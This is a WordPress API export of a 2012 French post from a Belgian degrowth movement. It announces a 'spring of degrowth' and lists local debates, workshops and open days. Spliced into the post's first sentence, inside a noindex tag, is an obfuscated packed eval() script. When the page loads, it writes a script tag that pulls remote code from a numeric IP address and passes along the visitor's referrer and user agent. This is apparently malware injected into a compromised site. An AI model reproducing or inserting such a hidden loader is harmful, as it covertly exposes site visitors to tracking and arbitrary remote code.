{"id":7025,"date":"2012-03-02T23:36:34","date_gmt":"2012-03-02T22:36:34","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=7025"},"modified":"2012-03-02T23:38:54","modified_gmt":"2012-03-02T22:38:54","slug":"pourquoi-un-printemps-de-la-decroissance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=7025","title":{"rendered":"Pourquoi un printemps de la d\u00e9croissance ?"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.objecteursdecroissance.be\/local\/cache-vignettes\/L100xH73\/siteon0-38e4a.jpg\" alt=\"\" width=\"100\" height=\"73\" \/>Depuis <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fhdtn|var|u0026u|referrer|zttzb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> deux si\u00e8cles, on n\u2019arr\u00eate pas le progr\u00e8s, nous dit-on. Pr\u00e9vaut toujours ce mythe de l\u2019homme prom\u00e9th\u00e9en qui se lib\u00e8re du joug d\u2019une nature cruelle pour enfin donner sa pleine mesure, cet homme qui, hier encore, \u00e9tait soumis aux famines, aux p\u00e9nuries et aux maladies et qui s\u2019en serait sorti par une magnifique marche vers le progr\u00e8s\u2026<\/p>\n<p>Mais le mythe a un revers et la marche vers le progr\u00e8s en arrive \u00e0 n\u2019\u00eatre plus qu\u2019une course au \u00ab\u00a0toujours plus\u00a0\u00bb. L\u2019homme semble lib\u00e9r\u00e9 des caprices de la nature mais se rend compte qu\u2019il a alt\u00e9r\u00e9e cette nature de mani\u00e8re grave et que les cons\u00e9quences pour lui sont redoutables.<\/p>\n<p>A c\u00f4t\u00e9 de la crise financi\u00e8re et son cort\u00e8ge de mesures d\u2019aust\u00e9rit\u00e9, \u00e0 c\u00f4t\u00e9 de la croissance \u00e9conomique tant souhait\u00e9e et du cort\u00e8ge de croissance des in\u00e9galit\u00e9s qui lui r\u00e9pond, \u00e0 c\u00f4t\u00e9 de la crise \u00e9cologique que l\u2019on craint et des mesures qui semblent impossibles \u00e0 prendre, il existe des alternatives. Simplicit\u00e9 volontaire au niveau individuel, actions collectives, actions politiques, r\u00e9flexions philo-sophiques, ces alternatives sont nombreuses, riches et vari\u00e9es. Elles nous aident \u00e0 construire un autre mod\u00e8le de soci\u00e9t\u00e9 pour sortir de la croissance \u00e0 tout prix.<\/p>\n<p>C\u2019est pour t\u00e9moigner de ces alternatives que le Mouvement politique des objecteurs de croissance a souhait\u00e9 cr\u00e9er un printemps de la d\u00e9croissance o\u00f9 les diff\u00e9rentes associations cr\u00e9atrices d\u2019alternatives \u00e0 la soci\u00e9t\u00e9 de croissance pourront mettre en commun ce qu\u2019elles font pour t\u00e9moigner qu\u2019un autre monde est possible et souhaitable.<\/p>\n<p>Colloques, soir\u00e9es de discussions ou ateliers pratiques, il y en aura pour tous les go\u00fbts\u00a0!<\/p>\n<p><strong>AGENDA<!--more--><\/strong><\/p>\n<p>Lancement officiel du Printemps de la d\u00e9croissance \u00e0 Namur: \u00a0\u00bbEscholle dominicale pour les pauvres 1660\u00a0\u00bb, rue Rupl\u00e9mont 20<br \/>\n<strong>Mercredi 7 mars<\/strong> de 20h \u00e0 22h Cin\u00e9 d\u00e9bat Cultures en Transition. A Herve \u00e0 l&rsquo;Espace de l&rsquo;H\u00f4tel de Ville. Une organisation Association. De bouche \u00e0 oreille. Une organisation Association. De bouche \u00e0 oreille.<br \/>\n<strong>Vendredi 9 mars<\/strong> \u00e0 18h Inauguration de l\u2019ALTER-CAFE, \u00e0 la Maison de l&rsquo;environnement de Li\u00e8ge<br \/>\n<strong>Mercredi 14 mar<\/strong>s \u00e0 20 h Le Bois Ram\u00e9al Fragment\u00e9, une technique \u00e0 la port\u00e9e des jardiniers. Maison des Associations, rue de Priesmont \u00e0 1495 Marbais (Villers-la-Ville)<br \/>\n<strong>Le vendredi 16 mars<\/strong> Information sur la vision collective et \u00ab\u00a0politique \u00bb du printemps de la D\u00e9croissance \u00e0 l\u2019occasion de la prochaine rencontre du groupe de Simplicit\u00e9 de Ans. Dominique 04-2505113<br \/>\n<strong>Samedi 17 mars<\/strong> de 14 h30 \u00e0 22 h Pour reconstruire la solidarit\u00e9, demain, le revenu inconditionnel d\u2019existence ? Facult\u00e9 de m\u00e9decine, Amphith\u00e9\u00e2tre M3, place du palais de justice \u00e0 5000 Namur<br \/>\n<a href=\"http:\/\/www.objecteursdecroissance.be\/spip.php?article300\" target=\"_blank\">http:\/\/www.<wbr>objecteursdecroissance.be\/<wbr>spip.php?article300<\/wbr><\/wbr><\/a><br \/>\n<strong>Samedi 24 mars<\/strong> de 12h \u00e0 17 h Amap, ferme p\u00e9dagogique, jardins partag\u00e9s, des solutions pour demain. A Villers-la-Ville, 9, ruelle du sablon<br \/>\n<strong>Mardi 27 mars<\/strong> Echange\/d\u00e9bat sur le th\u00e8me de la D\u00e9croissance au sein du groupe de Simplicit\u00e9 Volontaire de Li\u00e8ge Centre. Dominique 04-2505113<br \/>\n<strong>Dimanche 1er avril<\/strong> de 14 h \u00e0 18 h Imaginons NOTRE An 01 d\u00e9croissant. A l\u2019An Vert asbl, rue Mathieu Polain 4, 4020 Li\u00e8ge <a href=\"http:\/\/liege.mpoc.be\/\" target=\"_blank\">http:\/\/liege.mpOC.be<\/a><br \/>\n<strong>Dimanche 22 avril<\/strong> de 10h30 \u00e0 13h30 Formation sur le compostage. Au jardin du presbyt\u00e8re de Go\u00e9 (Limbourg)<br \/>\n<strong>Dimanche 22 avril<\/strong> de 12h \u00e0 17h A la d\u00e9couverte du sentier des abeilles Avenue Georges Speeckaert, 24 \u00e0 1495 Villers-la-Ville<br \/>\n<strong>Jeudi 26 avril<\/strong> \u00e0 14h Alimentation et D\u00e9forestation sur le site de HELMo- Ste-Marie, rue de Harlez 9 Dominique 04-2505113<br \/>\n<strong>Vendredi 27 avril<\/strong> de 19h \u00e0 23h Repas convivial produits locaux et de saisons. Au restaurant Croc Espace. Verviers, 26, rue de la R\u00e9gence<br \/>\n<strong>Vendredi 27 avril<\/strong> de 19h30 \u00e0 22h30 Aujourd&rsquo;hui plus que jamais \u00ab\u00a0Small is beautiful\u00a0\u00bb (1\/6) centr\u00e9 sur les banques. Uccle lieu \u00e0 d\u00e9terminer<br \/>\n<strong>Mardi 1 mai<\/strong> de 10h \u00e0 16h Journ\u00e9e m\u00e8res-enfants (foire aux savoir-faire) Limelette, maison de quartier du Buston<br \/>\n<strong>Mardi 1 ma<\/strong>i de 10h \u00e0 16h A My tenue d&rsquo;un stand au march\u00e9 artisanal de la commune. A Verviers \u00e0 la rencontre des citoyens<br \/>\n<strong>Mardi 1er mai,<\/strong> de 12 \u00e0 18h Rencontre objection de croissance et syndicalisme. Sur la place Saint-Paul \u00e0 Li\u00e8ge, \u00e0 la f\u00eate du 1er mai de la FGTB <a href=\"http:\/\/liege.mpoc.be\/\" target=\"_blank\">http:\/\/liege.mpOC.be<\/a><br \/>\n<strong>Dimanche 6 mai<\/strong> de 11h \u00e0 17h Tenue d&rsquo;un stand lors de la journ\u00e9e Main Verte. Bombaye, rue de l&rsquo;Eglise, 14<br \/>\n<strong>Samedi 12 mai<\/strong> de 11h \u00e0 18h Journ\u00e9e de la biodiversit\u00e9 \u00e0 Verviers un partenariat avec Croc Espace centre de formation dans l&rsquo;HoReCa<br \/>\n<strong>Dimanche 13 mai<\/strong> de 10h \u00e0 17h Stand sur la relocalisation de l&rsquo;alimentation au March\u00e9 aux fleurs Ville de Limbourg Dolhain + balade des Amis de la Terre<br \/>\n<strong>Vendredi 1 juin<\/strong> de 19h \u00e0 22h Aujourd&rsquo;hui plus que jamais \u00ab\u00a0Small is beautiful\u00a0\u00bb (2\/6) centr\u00e9 sur la probl\u00e9matique de la d\u00e9mocratie. Namur Arsenal<br \/>\n<strong>Vendredi 1 juin<\/strong> de 20h \u00e0 22h Ap\u00e9ro livres. Lectures sur le th\u00e8me de la relocalisation de l&rsquo;alimentation. A la biblioth\u00e8que communale, rue Nicolas Lambercy n\u00b07, Aywaille 4920<br \/>\n<strong>Dimanche 3 juin<\/strong> de 11h \u00e0 16h Portes ouvertes au jardin du presbyt\u00e8re. Go\u00e9 (Limbourg) \u00e0 c\u00f4t\u00e9 de l&rsquo;\u00e9glise<br \/>\n<strong>Dimanche 24 juin<\/strong> de 11h \u00e018h Portes ouvertes chez le maraicher Al Trappe. Limbourg, avenue Victor David, 197. March\u00e9 bio avec les Amis de la Terre<br \/>\n<strong>Samedi 30 juin<\/strong> de 10h \u00e0 17 h Forum collaboratif des savoirs et savoir-faire des objecteurs de croissance. Namur lieu \u00e0 d\u00e9terminer<\/p>\n<p><strong>DOCUMENTS ANNEXES<\/strong><\/p>\n<ul>\n<li><a title=\"tractprintemps + AA\" href=\"..\/wp-content\/uploads\/2012\/03\/tractprintemps-+-AA.pdf\">tractprintemps + AA<\/a><\/li>\n<li><a title=\"BROCHURE DECROISSANCE EN FORME FINAL-1\" href=\"..\/wp-content\/uploads\/2012\/03\/BROCHURE-DECROISSANCE-EN-FORME-FINAL-1.pdf\">BROCHURE DECROISSANCE EN FORME FINAL-1<\/a><\/li>\n<li><a title=\"Brochure pr\u00e9sentation mpOC  final\" href=\"..\/wp-content\/uploads\/2012\/03\/Brochure-pr%C3%A9sentation-mpOC-final.pdf\">Brochure pr\u00e9sentation mpOC final<\/a><\/li>\n<li><a title=\"PETIT GUIDEOC\" href=\"..\/wp-content\/uploads\/2012\/03\/PETIT-GUIDEOC.pdf\">PETIT GUIDEOC<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Depuis deux si\u00e8cles, on n\u2019arr\u00eate pas le progr\u00e8s, nous dit-on. Pr\u00e9vaut toujours ce mythe de l\u2019homme prom\u00e9th\u00e9en qui se lib\u00e8re du joug d\u2019une nature cruelle pour enfin donner sa pleine mesure, cet homme qui, hier encore, \u00e9tait soumis aux famines, &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=7025\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7025","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7025"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7025\/revisions"}],"predecessor-version":[{"id":7027,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/7025\/revisions\/7027"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7025"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7025"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}